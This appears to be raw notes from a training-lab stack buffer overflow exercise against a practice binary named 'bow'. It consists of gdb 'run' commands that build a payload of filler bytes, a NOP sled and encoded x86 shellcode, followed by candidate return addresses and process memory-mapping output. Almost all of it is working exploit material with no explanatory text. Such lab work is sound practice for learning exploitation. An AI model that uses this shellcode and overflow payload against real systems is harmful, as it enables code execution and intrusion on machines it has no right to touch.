run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xdb\xc1\xbf\xc2\x41\x6f\x5d\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x12\x31\x7d\x17\x03\x7d\x17\x83\x2f\xbd\x8d\xa8\x9e\xe5\xa5\xb0\xb3\x5a\x19\x5d\x31\xd4\x7c\x11\x53\x2b\xfe\xc1\xc2\x03\xc0\x28\x74\x2a\x46\x4a\x1c\xd2\xb8\xac\xdd\x44\xbb\xac\xa7\xfd\x32\x4d\xe7\x98\x14\xdf\x54\xd6\x96\x56\xbb\xd5\x19\x3a\x53\x88\x36\xc8\xcb\x3c\x66\x01\x69\xd4\xf1\xbe\x3f\x75\x8b\xa0\x0f\x72\x46\xa2" + "\x66" * 4')

"\xbb\xcd\xb4\x4e\x71\xdb\xcd\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x12\x31\x5a\x12\x83\xc2\x04\x03\x97\xba\xac\x84\x16\x18\xc7\x84\x0b\xdd\x7b\x21\xa9\x68\x9a\x05\xcb\xa7\xdd\xf5\x4a\x88\xe1\x34\xec\xa1\x64\x3e\x84\x4e\x97\xc0\x55\xd9\x95\xc0\x2f\x70\x13\x21\x7f\xe4\x73\xf3\x2c\x5a\x70\x7a\x33\x51\xf7\x2e\xdb\x04\xd7\xbd\x73\xb1\x08\x6d\xe1\x28\xde\x92\xb7\xf9\x69\xb5\x87\xf5\xa4\xb6"

run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + "\xbb\xcd\xb4\x4e\x71\xdb\xcd\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x12\x31\x5a\x12\x83\xc2\x04\x03\x97\xba\xac\x84\x16\x18\xc7\x84\x0b\xdd\x7b\x21\xa9\x68\x9a\x05\xcb\xa7\xdd\xf5\x4a\x88\xe1\x34\xec\xa1\x64\x3e\x84\x4e\x97\xc0\x55\xd9\x95\xc0\x2f\x70\x13\x21\x7f\xe4\x73\xf3\x2c\x5a\x70\x7a\x33\x51\xf7\x2e\xdb\x04\xd7\xbd\x73\xb1\x08\x6d\xe1\x28\xde\x92\xb7\xf9\x69\xb5\x87\xf5\xa4\xb6" + "\x66" * 4')

run $(python -c 'import sys; sys.stdout.buffer.write(b"\x55" * (1040 - 124 - 95 - 4) + b"\x90" * 124 + b"\xdb\xc1\xbf\xc2\x41\x6f\x5d\xd9\x74\x24\xf4\x5d\x2b\xc9\xb1\x12\x31\x7d\x17\x03\x7d\x17\x83\x2f\xbd\x8d\xa8\x9e\xe5\xa5\xb0\xb3\x5a\x19\x5d\x31\xd4\x7c\x11\x53\x2b\xfe\xc1\xc2\x03\xc0\x28\x74\x2a\x46\x4a\x1c\xd2\xb8\xac\xdd\x44\xbb\xac\xa7\xfd\x32\x4d\xe7\x98\x14\xdf\x54\xd6\x96\x56\xbb\xd5\x19\x3a\x53\x88\x36\xc8\xcb\x3c\x66\x01\x69\xd4\xf1\xbe\x3f\x75\x8b\xa0\x0f\x72\x46\xa2" + b"\x66" * 4)')

0xffffd300
0x565555af
0xffffdb72

info proc all
rocess 2556
warning: target file /proc/2556/cmdline contained unexpected null characters
cmdline = '/home/htb-student/bow'
cwd = '/home/htb-student'
exe = '/home/htb-student/bow'
Mapped address spaces:

        Start Addr   End Addr       Size     Offset objfile
        0x56555000 0x56556000     0x1000        0x0 /home/htb-student/bow
        0x56556000 0x56557000     0x1000        0x0 /home/htb-student/bow
        0x56557000 0x56558000     0x1000     0x1000 /home/htb-student/bow
        0xf7ded000 0xf7fbf000   0x1d2000        0x0 /lib32/libc-2.27.so
        0xf7fbf000 0xf7fc0000     0x1000   0x1d2000 /lib32/libc-2.27.so
        0xf7fc0000 0xf7fc2000     0x2000   0x1d2000 /lib32/libc-2.27.so
        0xf7fc2000 0xf7fc3000     0x1000   0x1d4000 /lib32/libc-2.27.so
        0xf7fc3000 0xf7fc6000     0x3000        0x0
        0xf7fcf000 0xf7fd1000     0x2000        0x0
        0xf7fd1000 0xf7fd4000     0x3000        0x0 [vvar]
        0xf7fd4000 0xf7fd6000     0x2000        0x0 [vdso]
        0xf7fd6000 0xf7ffc000    0x26000        0x0 /lib32/ld-2.27.so
        0xf7ffc000 0xf7ffd000     0x1000    0x25000 /lib32/ld-2.27.so
        0xf7ffd000 0xf7ffe000     0x1000    0x26000 /lib32/ld-2.27.so
        0xfffdd000 0xffffe000    0x21000        0x0 [stack]
Name:   bow
Umask:  0002
State:  t (tracing stop)
Tgid:   2556
Ngid:   0
Pid:    2556
PPid:   2554
TracerPid:      2554
Uid:    1001    1001    1001    1001
Gid:    1001    1001    1001    1001
FDSize: 64
Groups: 1001
